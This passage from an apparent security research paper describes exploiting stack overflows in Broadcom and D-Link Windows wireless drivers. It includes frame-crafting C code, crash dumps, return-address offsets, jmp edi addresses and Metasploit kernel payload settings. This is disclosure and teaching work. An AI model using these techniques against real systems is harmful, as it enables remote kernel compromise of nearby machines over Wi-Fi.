There are only a few basic things that the developer needs to be aware of. When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the framework that make it aware of the fact that any payloads used with this exploit will need to be appropriately encapsulated within a kernel-mode stager. With this simple action, the majority of the work associated with the kernel-mode payload is abstracted away from the developer. The only other element that a developer may need to deal with is defining extended parameters that further control the selection of different aspects of the kernel-mode payload. These controllable parameters are exposed to developers through the ExtendedOptions hash element in an exploit's global or target-specific Payload options. An example of what this might look like within an exploit can be seen here:

'Payload' =>
  {
    'ExtendedOptions' =>
      {
        'Stager'            => 'sud_syscall_hook',
        'Recovery'          => 'idlethread_restart',
        'KiIdleLoopAddress' => 0x804dbb27,
      }
  }

In the above example, the exploit has explicitly selected the underlying stager component that should be used by specifying the Stager hash element. The sud_syscall_hook stager is a symbolic name for the stager that was described in section 4.1. The example above also has the exploit explicitly selecting the recovery component that should be used. In this case, the recovery component that is selected is idlethread_restart, which is a symbolic name for the recovery component described previously. Additionally, the nt!KiIdleLoop address is specified for use with this particular recovery component. Under the hood, the use of the KernelMode mixin and the additional extended options results in the framework encapsulating whatever user-mode payload the end-user specified inside of a kernel-mode stager. In the end, this process is entirely transparent to both the developer and the end-user.
While the set of options that can be specified in the extended options hash will surely grow in the future, it makes sense to at least document the set of defined elements at the time of this writing. These options include:

Recovery: Defines the recovery component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes spin, which will spin the current thread; idlethread_restart, which will restart the Idle thread; and default, which is equivalent to spin. Over time, more recovery methods may be added. These can be found in recovery.rb.

RecoveryStub: Defines a custom recovery component.

Stager: Defines the stager component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes sud_syscall_hook. Over time, more stager methods may be added. These can be found in stager.rb.

UserModeStub: Defines the user-mode custom code that should be executed as part of the stage.

RunInWin32Process: Currently only applicable to the sud_syscall_hook stager. This element specifies the name of the system process, such as lsass.exe, that should be injected into.

KiIdleLoopAddress: Currently only applicable to the idlethread_restart recovery component. This element specifies the address of nt!KiIdleLoop.

While not particularly important to developers or end-users, it may be interesting for some to understand how this abstraction works internally. To start things off, the KernelMode mixin overrides a base class method called encode_begin. This method is called when a payload that is used by an exploit is being encoded. When this happens, the mixin declares a procedure that is subsequently called by the payload encoder in the context of encapsulating the pre-encoded payload.
The procedure itself is passed the original raw user-mode payload and the payload options hash (which contains the extended options, if any, that were specified in the exploit). It uses this information to construct the kernel-mode stager that is used to encapsulate the user-mode payload. If the procedure completes successfully, it returns a non-nil buffer that contains the original user-mode payload encapsulated within a kernel-mode stager. The kernel-mode stager and other components are actually contained within the payloads subsystem of the Rex library under lib/rex/payloads/win32/kernel.

5) Case Studies

This chapter describes three separate vulnerabilities that were found by the authors in real world 802.11 wireless device drivers. These three issues were found through a combination of fuzzing and manual analysis.

5.1) BroadCom

The first vulnerability that was subject to the process described in this paper was an issue that was found in BroadCom's wireless device driver. This vulnerability was discovered by Chris Eagle as a result of his interest in doing some reversing of kernel-mode code. Chris noticed what appeared to be a conventional stack overflow in the way the BroadCom device driver handled beacon packets. As a result of this tip, a simple program was written that generated beacon packets with overly sized SSIDs. The code that was used to do this is shown below:

int main(int argc, char **argv)
{
   Packet_80211 BeaconPacket;

   CreatePacketForExploit(BeaconPacket, basic_target);

   printf("Looping forever, sending packets.\n");

   while(true)
   {
      int ret = Send80211Packet(&in_tx, BeaconPacket);
      usleep(cfg.usleep);

      if (ret == -1)
      {
         printf("Error tx'ing packet. Is interface up?\n");
         exit(0);
      }
   }
}

void CreatePacketForExploit(Packet_80211 &P, struct target T)
{
   Packet_80211_mgmt Beacon;
   u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

   Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid);
   MgmtCrafter.craft(8, Beacon); // 8 = beacon

   P = Beacon;

   printf("\n");

   if (T.payload_size > 255)
   {
      printf("invalid target. payload sizes > 255 wont fit in a single IE\n");
      exit(0);
   }

   u_int8_t fixed_parameters[12] = {
      '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes)
      0x64, 0x00,  // beacon interval, 1.1024 secs
      0x11, 0x04   // capability information. ESS, WEP, Short slot time
   };

   P.AppendData(sizeof(fixed_parameters), fixed_parameters);

   u_int8_t SSID_ie[257]; // 255 + 2 for type, value
   u_int8_t *SSID = SSID_ie + 2;

   SSID_ie[0] = 0;
   SSID_ie[1] = 255;
   memset(SSID, 0x41, 255);

   // Okay, SSID IE is ready for appending.
   P.AppendData(sizeof(SSID_ie), SSID_ie);
   P.print_hex_dump();
}

As a result of running this code, 802.11 beacon packets were produced that did indeed contain overly sized SSIDs. However, these packets appeared to have no effect on the BroadCom device driver. After considerable head scratching, a modification was made to the program to see if a normally sized SSID would cause the device driver to process it. If it were processed, it would mean that the fake SSID would show up in the list of available networks. Even after making this modification, the device driver still did not appear to be processing the manually crafted 802.11 beacon packets. Finally, it was realized that the driver might have some checks in place such that it would only process beacon packets from networks that also respond to 802.11 probes. To test this theory out, the code was changed in the manner shown below:

CreatePacketForExploit(BeaconPacket, basic_target);

// CreatePacket returns a beacon, we will also send out directed
// probe responses.
Packet_80211 ProbePacket = BeaconPacket;
ProbePacket.wlan_header->subtype = 5; // probe response.
ProbePacket.setDstAddr(cfg.dst);

...

while(true)
{
   int ret = Send80211Packet(&in_tx, BeaconPacket);
   usleep(cfg.usleep);

   ret = Send80211Packet(&in_tx, ProbePacket);
   usleep(2*cfg.usleep);
}

Sending out directed probe responses as well as beacon packets caused results to be generated immediately. When a small SSID was sent, it would suddenly show up in the list of available wireless networks. When an overly sized SSID was sent, it resulted in a much desired bluescreen as a result of the stack overflow that Chris had identified. The following output shows some of the crash information associated with transmitting an SSID that consisted of 255 0xCC's:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually caused by
drivers using improper addresses.  If kernel debugger is available get stack
backtrace.
Arguments:
Arg1: ccccfe9d, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: f6e713de, address which referenced memory
...
TRAP_FRAME:  80550004 -- (.trap ffffffff80550004)
ErrCode = 00000000
eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308
eip=f6e713de esp=80550078 ebp=805500e0 iopl=0    nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000        efl=00010246
bcmwl5+0xf3de:
f6e713de f680d131000002  test byte ptr [eax+31D1h],2  ds:0023:ccccfe9d=??
...
kd> k v
*** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de
80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc
805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo])
805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0])
805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0])

In this case, the crash occurred because a variable on the stack that was subsequently used as a pointer was overwritten. This overwritten pointer was then dereferenced, here through the eax register. Although the crash occurred as a result of the dereference, it's important to note that the return address for the stack frame was successfully overwritten with a controlled value of 0xcccccccc. If the function had been allowed to return cleanly without trying to dereference corrupted pointers, full control of the instruction pointer would have been obtained.

In order to avoid this crash and gain full control of the instruction pointer, it's necessary to calculate the offset of the return address from the start of the buffer that is being transmitted. Figuring out this offset also has the benefit of making it possible to determine the minimum number of bytes that must be transmitted to trigger the overflow. This is important because it may be useful when it comes to preventing the dereference crash that was seen previously.

There are many different ways in which the offset of the return address can be determined. In this situation, the simplest approach is to transmit a buffer that contains an incrementing array of bytes. For instance, byte index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return address is overwritten with will then make it possible to calculate its offset within the buffer.
After transmitting a packet that makes use of this technique, the following crash is rendered:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually caused by
drivers using improper addresses.  If kernel debugger is available get stack
backtrace.
Arguments:
Arg1: 605f902e, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: f73673de, address which referenced memory
...
STACK_TEXT:
80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233
WARNING: Stack unwind information not available. Following frames may be wrong.
805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de
80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59
805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21
805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46
805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26

From this stack trace, it can be seen that the return address was overwritten with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the offset within the buffer that contains the SSID is 0x59.

With knowledge of the offset at which the return address is overwritten, the next step becomes figuring out where in the buffer to place the arbitrary code that will be executed. Before going down this route, it's important to provide a little bit of background on the format of 802.11 Management packets. Management packets encode all of their information in what the standard calls Information Elements (IEs). IEs have a one byte identifier followed by a one byte length which is subsequently followed by the associated IE data. For those familiar with Type-Length-Value (TLV), IEs are roughly the same thing. Based on this definition, the largest possible IE is 257 bytes (2 bytes of overhead, and 255 bytes of data).
The upshot of the size restrictions associated with an IE is that the largest possible SSID that can be copied to the stack is 255 bytes. When attempting to find the offset of the return address on the stack, an SSID IE was sent with a 255 byte SSID. Considering the fact that a stack overflow occurred, one might reasonably expect to find the entire 255 byte SSID on the stack as a result of the overflow. A quick dump of the stack can be used to validate this assumption:

kd> db esp L 256
80550078  2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01  ................
80550088  02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c  ................
80550098  0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c  ................
805500a8  1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00  ... !"#$%&.(....
805500b8  82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80  ....$0Hl...`D.U.
805500c8  3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c  =>?@ABCDEF....KL
805500d8  4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c  M..PQRSTUVWXYZ[\
805500e8  5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c  ]^_`abcdefghijkl
805500f8  6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c  mnopqrstuvwxyz{|
80550108  7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c  }~..............
80550118  8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c  ................
80550128  9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac  ................
80550138  ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc  ................
80550148  bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc  ................
80550158  cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc  ................
80550168  dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec  ................
80550178  ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc  ................
80550188  fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80  ..........j...U.

Based on this dump, it appears that the majority of the SSID was indeed copied across the stack.
However, a large portion of the buffer prior to the offset of the return address has been mangled. In this instance, the return address appears to be located at 0x805500e4. While the area prior to this address appears mangled, the area succeeding it has remained intact. In order to try to prove the possibility of gaining code execution, a good initial attempt would be to send a buffer that overwrites the return address with the address that immediately succeeds it (which will be composed of int3's). If everything works according to plan, the vulnerable function will return into the int3's and bluescreen the machine in a controlled fashion. This accomplishes two things. First, it proves that it is possible to redirect execution into a controllable buffer. Second, it gives a snapshot of the state of the registers at the time that execution control is redirected. The layout of the buffer that would need to be sent to trigger this condition is described in the diagram below:

[Padding.......][EIP][payload of int3's]
 ^               ^    ^
 |               |    \_ Can hold at most 163 bytes of arbitrary code.
 |               \_ Overwritten with 0x8055010d which points to the payload
 \_ Start of SSID that is mangled after the overflow occurs.

Transmitting a buffer that is structured as shown above does indeed result in a bluescreen. It is possible to differentiate actual crashes from those generated as the result of an int3 by looking at the bugcheck information. The use of an int3 will result in an unhandled kernel-mode exception, which is bugcheck code 0x8e. Furthermore, the exception code information associated with this (the first parameter of the bugcheck) will be set to 0x80000003. Exception code 0x80000003 is used to indicate that the unhandled exception was associated with a trap instruction. This is generally a good indication that the arbitrary code you specified has executed.
It's also very useful in situations where it is not possible to do remote kernel debugging and one must rely strictly on crash dump analysis.

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck.  Usually the exception address pinpoints the
driver/function that caused the problem.  Always note this address as well as
the link date of the driver/image that contains this address.  Some common
problems are exception code 0x80000003.  This means a hard coded breakpoint
or assertion was hit, but this system was booted /NODEBUG.  This is not
supposed to happen as developers should never have hardcoded breakpoints in
retail code, but ...  If this happens, make sure a debugger gets connected,
and the system is booted /DEBUG.  This will let us see why this breakpoint
is happening.
Arguments:
Arg1: 80000003, The exception code that was not handled
Arg2: 8055010d, The address that the exception occurred at
Arg3: 80550088, Trap Frame
Arg4: 00000000
...
TRAP_FRAME:  80550088 -- (.trap ffffffff80550088)
ErrCode = 00000000
eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e
eip=8055010e esp=805500fc ebp=8055010d iopl=0    nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000        efl=00000246
nt!KiDoubleFaultStack+0x2c8e:
8055010e cc  int 3
...
STACK_TEXT:
8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b
80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1
80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d
80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad
8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e
WARNING: Frame IP not in any known module. Following frames may be wrong.
80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc

The above crash dump information definitely shows that arbitrary code execution has been achieved. This is a big milestone. It pretty much proves that exploitation will be possible. However, it doesn't prove how reliable or portable it will be. For that reason, the next step involves identifying changes to the exploit that will make it more reliable and portable from one machine to the next. Fortunately, the current situation already appears like it might afford a good degree of portability, as the stack addresses don't appear to shift around from one crash to the next.

At this stage, the return address is being overwritten with a hard-coded stack address that points immediately after the return address in the buffer. One of the problems with this is that the amount of space immediately following the return address is limited to 163 bytes due to the maximum size of the SSID IE. This is enough room for a small payload stub, but probably not large enough for a payload that would provide anything interesting in terms of features. It's also worth noting that overwriting past the return address might overwrite some important elements on the stack that could lead to the system crashing at some later point for hard to explain reasons. When dealing with kernel-mode vulnerabilities, it is advisable to clobber as little state as possible in order to reduce the amount of collateral damage that might ensue. Limiting the amount of data that is used in the overflow to only the amount needed to overwrite the return address means that the total size of the SSID IE will be limited and not suitable to hold arbitrary code.
However, there's no reason why code couldn't be placed in a completely separate IE unrelated to the SSID. This means we could transmit a packet that included both the bogus SSID IE and another arbitrary IE which would be used to contain the arbitrary code. Although this would work, it must be possible to find a reference to the arbitrary IE that contains the arbitrary code. One approach that might be taken to do this would be to search the address space for an intact copy of the 802.11 packet that is transmitted. Before going down that path, it makes sense to try to find instances of the packet in memory using the kernel debugger. A simple search of the address space using the destination MAC address of the packet sent is a good way to find potential matches. In this case, the destination MAC is 00:14:a5:06:8f:e6.

kd> .ignore_missing_pages 1
Suppress kernel summary dump missing page error message
kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6
8418588a  00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00  ............@...
841b0006  00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00  ................
841b1534  00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00  ................
84223028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845dc028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845de828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845df828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f3028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f3828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f4028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f5028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
84642d4c  00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00  ..........*.....
846d6d4c  00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00  .........y!.....
84eda06c  00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00  ................
84efdecc  00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a  ........e.....%.

The above output shows that quite a few matches were found. One important thing to note is that the BSSID used in the packet that contained the overly sized SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management packets are arranged in the order DST, SRC, BSSID. While some of the above matches do not appear to contain the entire packet contents, many of them do. Picking one of the matches at random shows the contents in more detail:

kd> db 84223028 L 128
84223028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
84223038  02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04  ............d...
84223048  00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  ..J..U...U...U..
84223058  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223068  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223078  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223088  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223098  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
842230a8  01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc  .U..............
842230b8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230c8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230d8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230e8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230f8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
84223108  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................

Indeed, this does appear to be a full copy of the original packet. The reason why there are so many copies of the packet in memory might be related to the fact that the current form of the exploit is transmitting packets in an infinite loop, thus causing the driver to have a few copies lingering in memory.
The fact that multiple copies exist in memory is good news considering it increases the number of places that could be used for return addresses. However, it's not as simple as hard-coding one of these addresses into the exploit, considering that pool-allocated addresses will not be predictable. Instead, steps will need to be taken to find a reference to the packet through a register or through some other context. In this way, a very small stub could be placed after the return address in the buffer that would immediately transfer control into a copy of the packet somewhere else in memory. Although some initial work with the debugger showed a couple of references to the original packet on the stack, a much simpler solution was identified. Consider the following register context at the time of the crash: 

kd> r 
Last set context: 
eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e 
eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc 
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 
nt!KiDoubleFaultStack+0x2c8e: 
8055010e cc int 3 

Inspecting each of these registers individually eventually shows that the edi register is pointing into a copy of the packet. 

kd> db edi 
845f302e 00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1 ................ 
845f303e b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55 ......d.....J..U 
845f304e 80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55 ...U...U...U...U 

As chance would have it, edi is pointing to the source MAC in the 802.11 packet that was sent. If it had instead been pointing to the destination MAC or the end of the packet, it would not have been of any use. With edi pointing to the source MAC, the rest of the cards fall into place. The hard-coded stack address that was previously used to overwrite the return address can be replaced with an address (probably inside ntoskrnl.exe) that contains the equivalent of a jmp edi instruction. 
When the exploit is triggered and the vulnerable function returns, it will transfer control to the location that contains the jmp edi. The jmp edi, in turn, transfers control to the first byte of the source MAC. By setting the source MAC to some executable code, such as a relative jump instruction, it is possible to finally transfer control into a location of the packet that contains the arbitrary code that should be executed. This solves the problem of using the hard-coded stack address as the return address and should help to make the exploit more reliable and portable between targets. However, this portability will be limited by the location of the jmp edi instruction that is used when overwriting the return address. Finding the location of a jmp edi instruction is relatively simple, although more effective measures could be used to cross-reference addresses in an effort to find something more portable. Experimentation shows that 0x8066662c is a reliable location: 

kd> s nt L?10000000 ff e7 
8063abce ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d ...!Gp!......8.= 
806590ca ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff ..._..."......t. 
806590d9 ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc ...^..[......... 
8066662c ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7 .......t.3.B.... 
806bb44b ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04 ...l..B..?*..... 
... 

With the exploit all but finished, the final question that remains unanswered is where the arbitrary code should be placed in the 802.11 packet. There are a few different ways that this could be tackled. The simplest solution to the problem would be to simply append the arbitrary code immediately after the SSID in the packet. However, this would make the packet malformed and might cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA IE, could be used as a container for the arbitrary code, as suggested earlier in this section. For now, the authors decided to take the middle road. 
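As a rough sketch of the frame layout discussed above -- a management header (DST, SRC, BSSID), the fixed beacon fields, an oversized SSID IE to trigger the overflow, and a vendor-specific (WPA) IE acting as payload container -- consider the following builder. The beacon interval (0x0064) and capability bytes (0x11 0x04) mirror the memory dump shown earlier; the filler byte, offsets, and function name are assumptions for illustration, not the exploit's actual code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Build an illustrative malicious beacon into `out`; returns bytes
   written, or 0 if `out` is too small. */
size_t build_beacon(unsigned char *out, size_t outlen,
                    const unsigned char dst[6], const unsigned char src[6],
                    const unsigned char bssid[6],
                    const unsigned char *payload, uint8_t payload_len)
{
    size_t need = 24 + 12 + 2 + 255 + 2 + payload_len;
    if (outlen < need)
        return 0;
    unsigned char *p = out;
    *p++ = 0x80; *p++ = 0x00;           /* frame control: beacon */
    *p++ = 0x00; *p++ = 0x00;           /* duration */
    memcpy(p, dst, 6);   p += 6;        /* management order: DST, SRC, BSSID */
    memcpy(p, src, 6);   p += 6;
    memcpy(p, bssid, 6); p += 6;
    *p++ = 0x00; *p++ = 0x00;           /* sequence control */
    memset(p, 0, 8); p += 8;            /* timestamp */
    *p++ = 0x64; *p++ = 0x00;           /* beacon interval 0x0064, as in the dump */
    *p++ = 0x11; *p++ = 0x04;           /* capabilities, as in the dump */
    *p++ = 0x00; *p++ = 0xff;           /* SSID IE with oversized length 255 */
    memset(p, 0x41, 255); p += 255;     /* filler that smashes the stack buffer */
    *p++ = 0xdd; *p++ = payload_len;    /* vendor-specific (WPA) IE container */
    memcpy(p, payload, payload_len); p += payload_len;
    return (size_t)(p - out);
}
```

The SSID filler here is inert padding; in the real exploit it carries the overwritten return address at the correct offset within the driver's stack frame.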
By default, a WPA IE will be used as the container for all payloads, regardless of whether or not the payloads fit within the IE. This has the effect of allowing all payloads smaller than 256 bytes to be part of a well-formed packet. Payloads that are larger than 255 bytes will cause the packet to be malformed, but perhaps not badly enough to cause the driver to drop the packet. An alternate solution to this issue can be found in the NetGear case study. At this point, the structure of the buffer and the packet as a whole have been completely researched and are ready to be tested. The only thing left to do is incorporate the arbitrary code that was described in 4.1. Much time was spent debugging and improving the code in order to produce a reliable exploit. 

5.2) D-Link 

Soon after the Broadcom exploit was completed, the authors decided to write a suite of fuzzing modules that could discover similar issues in other wireless drivers. The first casualty of this process was the A5AGU.SYS driver provided with D-Link's DWL-G132 USB wireless adapter. The authors configured the test machine (Windows XP SP2) so that a complete snapshot of kernel memory was included in the system crash dumps. This ensures that when a crash occurs, enough useful information is available to debug the problem. Next, the latest driver for the target device (v1.0.1.41) was installed. Finally, the beacon fuzzing module was started and the card was inserted into the USB port of the test system. Five seconds later, a beautiful blue screen appeared while the crash dump was written to disk. 

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) 
An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. 
Arguments: Arg1: 56149a1b, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: 56149a1b, address which referenced memory ErrCode = 00000000 eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6 eip=56149a1b esp=80550658 ebp=82015000 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 56149a1b ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from 56149a1b to 804e2158 FAILED_INSTRUCTION_ADDRESS: +56149a1b 56149a1b ?? ??? STACK_TEXT: 805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233 80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b 80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000 80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54 805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc 805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540 805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae 80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae 80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197 80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2 805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373 805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137 80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224 80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 Five seconds of fuzzing had produced a flaw that made it possible to gain control of the instruction pointer. In order to execute arbitrary code, however, a contextual reference to the malicious frame had to be located. 
In this case, the edi register pointed into the source address field of the frame in just the same way that it did in the Broadcom vulnerability. The bogus eip value can be found just past the source address where one would expect it -- inside one of the randomly generated information elements. kd> dd 0x8263b7a6 (edi) 8263b7a6 f3793ee8 3ee8a34e a34ef379 6eb215f0 8263b7b6 fde19019 006431d8 9b001740 63594364 kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56 8263bd2b 1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51 ...V*.Vc.U..cn.Q The next step was to determine what information element was causing the crash. After decoding the in-memory version of the frame, a series of modifications and retransmissions were made until the specific information element leading to the crash was found. Through this method it was determined that a long Supported Rates information element triggers the stack overflow shown in the crash above. Exploiting this flaw involved finding a return address in memory that pointed to a jmp edi, call edi, or push edi; ret instruction sequence. This was accomplished by running the msfpescan application included with the Metasploit Framework against the ntoskrnl.exe of our target. The resulting addresses had to be adjusted to account for the kernel's base address. The address that was chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + 0x0041a6eb ). $ msfpescan ntoskrnl.exe -j edi [ntoskrnl.exe] 0x0040365d push edi; retn 0x0001 0x00405aab call edi 0x00409d56 push edi; ret 0x0041a6eb jmp edi Finally, the magic frame was reworked into an exploit module for the 3.0 version of the Metasploit Framework. When the exploit is launched, a stack overflow occurs, the return address is overwritten with the location of a jmp edi, which in turn lands on the source address of the frame. The source address was modified to be a valid x86 relative jump, which directs execution into the body of the first information element. 
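Two steps above lend themselves to a short sketch: rebasing the msfpescan hit against the kernel's load address, and encoding the frame's source MAC as an x86 short jump. The `0xEB` opcode (jmp short rel8, displacement measured from the end of the two-byte instruction) and `0x90` (nop) are standard x86 encodings; the function names and nop padding are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* msfpescan reports file-relative addresses; the exploit needs them
   rebased to where the kernel actually loaded, as in
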